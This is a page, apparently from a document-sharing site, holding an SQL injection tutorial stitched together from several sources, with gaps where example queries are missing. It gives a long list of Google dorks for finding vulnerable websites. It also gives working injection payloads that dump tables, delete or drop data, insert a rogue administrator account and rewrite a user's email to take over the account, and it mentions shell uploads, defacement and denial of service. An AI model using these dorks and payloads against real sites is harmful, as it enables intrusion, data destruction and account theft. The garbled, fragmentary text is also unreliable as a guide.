Professional Documents
Culture Documents
SQL injection is a code injection technique that exploits a security vulnerability occurring in the
database layer of an application. The vulnerability is present when user input is either incorrectly
filtered for string literal escape characters embedded in SQL statements or user input is not
strongly typed and thereby unexpectedly executed. It is an instance of a more general class of
vulnerabilities that can occur whenever one programming or scripting language is embedded
inside another. SQL injection attacks are also known as SQL insertion attacks.
Step-by-Step tutorial for SQL Injection
Step 1: Find a website that is vulnerable to the attack. This is the first step in SQLi and like every
other hack attack is the most time consuming, and is the only time consuming step. Once you get
through this, rest is a cake-walk. Now, let us all know what kind of pages are vulnerable to this
attack. We are providing you with a few dorks(google strings to find vulnerable sites). Though at
the end of this post, we'll provide a list of vulnerable sites.
Dorks:
"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
Display:
Normal: SELECT * FROM customers WHERE username = 'timmy'
Injection: SELECT * FROM customers WHERE username = '' OR 1''
The normal query is no problem, as our MySQL statement will just select everything from
customers that has a username equal to timmy.
However, the injection attack has actually made our query behave differently than we intended.
By using a single quote (') they have ended the string part of our MySQL query
and then added on to our WHERE statement with an OR clause of 1 (always true).
This OR clause of 1 will always be true and so every single entry in the "customers" table would
be selected by this statement!
Display:
SELECT * FROM customers WHERE username = ' '; DELETE FROM customers WHERE 1
or username = ' '
If you were run this query, then the injected DELETE statement would completely empty your
"customers" table. Now that you know this is a problem, how can you prevent it?
Display:
Escaped Bad Injection:
SELECT * FROM customers WHERE username = '\' OR 1\''
Escaped Evil Injection:
SELECT * FROM customers WHERE username = '\'; DELETE FROM customers WHERE 1
or username = \''
Notice that those evil quotes have been escaped with a backslash \, preventing the injection
attack. Now all these queries will do is try to find a username that is just completely ridiculous:
And I don't think we have to worry about those silly usernames getting access to our MySQL
database. So please do use the handy mysql_real_escape_string()function to help prevent SQL
Injection attacks on your websites. You have no excuse not to use it after reading this lesson!
What is the cause of most problems related to SQL injection?
Webdevelopers aren't always really dumb and they have also heard of hackers and have
implemented some security measures like WAF or manual protetion. WAF is an Web application
firewall and will block all malicous requests, but WAF's are quite easy to bypass. Nobody would like to
have their site hacked and they are also implementing some security, but ofcourse it would be false to
say that if we fail then it's the servers fault. There's also a huge possibility that we're injecting
otherwise than we should.
A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to
an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting
(XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified
and blocked. The effort to perform this customization can be significant and needs to be maintained
as the application is modified.
If you're interested about WAF's and how they're working then I suggest to read it from wikipedia
http://en.wikipedia.org/wiki/Application_firewall
If the last example is working for you then it means you have to use it in the next steps also, there isn't
anything complicated, but to make everything clear I'll still make an example.
http://site.com/news.php?id=1
You have to start injecting to look at the tables and columns in them, but let's assume that the current
table is named as "News".
With SQL injection you can SELECT, DROP, UPDATE and INSERT information to the database. The
SELECT is probably already covered at all the tutorials so let's focus on the other three. Let's start
with the DROP command.
I'd like to get rid of a table, how to do it?
That seems easy, we have just dropped the table. I'd explain what we did in the above statement, but
it's quite hard to explain it because you all can understand the above command. Unfortunally most of
'hackers' who're making tutorials on SQL injection aren't aware of it and sometimes that three words
are more important than all the information we can read on some tutorials.
Let's head to the next statement what's UPDATE.
http://site.com/news.php?id=1; UPDATE 'Table name' SET 'data you want to edit' = 'new data'
WHERE column_name='information'-Above explanation might be quite confusing so I'll add an query what you're most likely going to use in
real life :
Luckily "INSERT" isn't that easy as the "DROP" statement is, but still quite understandable. Let's go
further with Administrator privileges because that's what most of people are heading to. Adding an
administrator account would be like this :
http://site.com/news.php?id=1; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password',
'details') VALUES (2,'Rynaldo','Crackhackforum','NA')-INSERT INTO 'admin_login' means that we're inserting something to 'admin_login'. Now we have to
give instructions to the database what exact information we want to add, ('login_id', 'login_name',
'password', 'details') means that the specifications we're adding to the DB are Login_id, Login_name,
password and details and those are the information the database needs to create a new account. So
far we have told the database what information we want to add, we want to add new account,
password to it, account ID and details. Now we have to tell the database what will be the new
account's username, it's password and account ID, VALUES (2,'Rynaldo','Crackhackforum','NA')-- .
That means account ID is 2, username will be Rynaldo, password of the account will be
Crackhackforum. Your new account has been added to the database and all you have to do is
opening up the Administrator page and login.
Passwords aren't working
Sometimes the site is vulnerable to SQL and you can get the passwords.Then you can find the sites
username and password, but when you enter it into adminpanel then it shows "Wrong password".This
can be because those usernames and passwords are there, but aren't working. This is made by site's
admin to confuse you and actually the Cpanel doesn't contain any username/password. Sometimes
are accounts removed, but the accounts are still in the database. Sometimes it isn't made by the
admin and those credentials has been left in the database after removing the login page, sometimes
the real credentials has been transfered to another database and old entries hasn't been deleted.
Some sites doesn't contain admin control panel and that means you can use any method for finding
the admin page, but that doesn't even exist. You might ask "I got the username and password from
the database, why isn't there any admin login page then?", but sometimes they are just left in the
database after removing the Cpanel.
Mostly people are using tools called "Admin page finders".They have some specific list of pages and
will try them.If the page will give HTTP response 200 then it means the page exists, but if the server
responds with HTTP response 404 then it means the page doesn't exist in there.If the page exist what
is in the list then tool will say "Page found".I don't have any tool to share at the moment, but if you're
downloading it yourself then be beware because there are most of those tools infected with virus's.
Mostly the tools I mentioned above, Admin Page Finders doesn't usually find the administrator page if
it's costumly made or renamed. That means quite oftenly those tools doesn't help us out and we have
to use an alternative and I think the best one is by using site crawlers. Most of you are probably
having Acunetix Web Vulnerability scanner 8 and it has one wonderful feature called site crawler. It'll
show you all the pages on the site and will %100 find the login page if there exists one in the page.
won't become a real hacker neither. My above text might give you an question, "But I've seen that
even Proffesional hackers are using SQLmap?" and I'd like to say that everything isn't always black &
white. If there are 10 databases, 50 tables in them and 100 columns in the table then it would just
take days to proccess all that information.I'm also sometimes using automated tools because it makes
my life easier, but to use those tools you first have to learn how to use those tools manually and that's
what the tutorial above is teaching you.
Use automated tools only to make your life easier, but don't even look at them if you don't know how
to perform the attack manually.
What else can I do with SQL injection besides extracting information?
There are many things besides extracting information from the database and sometimes they are
much more powerful. We have talked above that sometimes the database doesn't contain
Administrator's credentials or you can't crack the hashes. Then all the injection seems pointless
because we can't use the information we have got from the database. Still we can use few another
methods. Just like we can conduct CSRF attack with persistent XSS, we can also move to another
attacks through SQL injection. One of the solution would be performing DOS attack on the website
which is vulnerable to SQL injection. DOS is shortened from Denial of service and it's tottaly different
from DDOS what's Distributed Denial of Service. I think that you all probably know what these are, but
if I'm taking that attack up with a sentence then DOS will allow us to take down the website
temporarely so users wouldn't have access to the site. The other way would be uploading our shell
through SQL injection. If you're having a question about what's shell then by saying it shortly, it's a
script what we'll upload to the server and it will create an backdoor for us and will give us all the
privileges to do what we'd like in the server and sometimes by uploading a shell you're having more
rights to modify things than the real Administrator has. After you have uploaded a shell you can move
forward to symlink what means we can deface all the sites what are sharing the same server. Shelling
the website is probably most powerful thing you can use on the website. I have not covered how to
upload a shell through SQL injection and haven't covered how to cause DOS neither, but probably will
do in my next tutorials because uploading a shell through SQL is another kind of science, just like
bypassing WAF's. Those are the most common methods what attackers will put in use after they can't
get anything useful out of the database. Ofcourse every website doesn't have the same vulnerabilities
and they aren't responding always like we want and by that I mean we can't perform those attacks on
all websites.We have all heard that immagination is unlimited and you can do whatever you'd like.
That's kinda true and hacking isn't an exception, there are more ways than I can count.
What to do if all the information doesn't display on the page?
I actually have really rarely seen that there are so much information on the webpage that it all just
don't fit in there, but one person recently asked that question from me and I decided to add it here.
Also if you're having questions then surely ask and I'll update the article. If we're getting back to the
question then the answer is simple, if all the information can't fit in the screen then you have to look at
the source code because everything displayed on the webpage will be in there. Also sometimes
information will appear in the tab where usually is the site's name. If you can't see the information then
sometimes it's hiddened, but with taking a deeper look you might find it from the source. That's why
you always have to look all the solutions out before quiting because sometimes you might think "I
can't inject into that..", but actually the answer is hiddened in the source.
doesn't have any influence to the injection because it doesn't mean anything, but it's still being used
because it's used as end of query. It means if I'm injecting as : http://site.com/news.php?id=-1 union
select 1,2,3,4,5-- asasdasd then the server will skip everything after -- and asasdasd won't be readed.
It's just like adding to masking a shell. Sometimes injection isn't working if -- is missing because -- tells
the DB that "I'm the end of query, don't read anything what comes after me and execute everything
infront of me". It's just like writing a sentence without a dot, people might think it's not the end of your
sentence and will wait until you write the other part of the sentence and the end will come if you add
the dot to your sentence.
SELECT data
FROM table
This is, of course, a guess at what the SQL being run by the application would look like, because a
hacker would not know this information since he does not have access to the application code. The
$email_input variable is used to hold whatever text the user inputs into the email address form
field.
hacker@programmerinterview.com'
If the hacker puts that exact text into the email address form field then there are basically 2
possibilities:
1. The application will first sanitize the input by removing the extra quote at the end,
because we will assume that the application considers email addresses with quotes as
potentially malicious. But, a side note: email addresses can actually contain quotes
according to IETF standards. Sanitizing data is the act of stripping out any characters that
arent needed from the data that is supplied in our case, the email address. Then, the
application may run the sanitized input in the database query, and search for that
particular email address in the database (without the quote of course).
2. The application will not sanitize the input first, and will take the input from the hacker
and immediately run it as part of the SQL. This is what the hacker is hoping would happen,
and we will assume that this is what our hypothetical application is doing. This is also
known as constructing the SQL literally, without sanitizing. What it means is that the SQL
being run by the application would look like this pay extra attention to the fact that there
is now an extra quote at the end of the WHERE statement in the SQL below:
SELECT data
FROM table
WHERE Emailinput = 'hacker@programmerinterview.com'';
Now, what would happen if the SQL above is executed by the application? Well, the SQL parser
would see that there is an extra quote mark at the end, and it will abort with a syntax error.
Y';
UPDATE table
SET email = 'hacker@ymail.com'
WHERE email = 'joe@ymail.com';
Note that the SQL above is completely SQL compliant and legitimate. You can see that after the Y
there is an extra quote followed by a semicolon, which allows the hacker to close the statement
and then incredibly run another statement of his own!
Then, if this malicious code is run by the application under attack, it would look like this:
SELECT data
FROM table
WHERE Emailinput = 'Y';
UPDATE table
SET email = 'hacker@ymail.com'
WHERE email = 'joe@ymail.com';
Can you see what this code is doing? Well, it is resetting the email address that belongs to
joe@ymail.com to hacker@ymail.com. This means that the hacker is now changing a users
account so that it uses his own email address hacker@ymail.com. This then means that the
hacker can reset the password and have it sent to his own email address! Now, he also has a
login and a password to the application, but it is under someone elses account.
In the example above, we did skip some steps that a hacker would have taken to figure out the
table name and the table layout, because we wanted to keep this article relatively short. But, the
idea is that SQL injection is a real threat, and taking measures to prevent it is extremely
important.
Now, the question is how to prevent SQL injection attacks? Well, read on to the next page or just
click here: SQL Injection Prevention.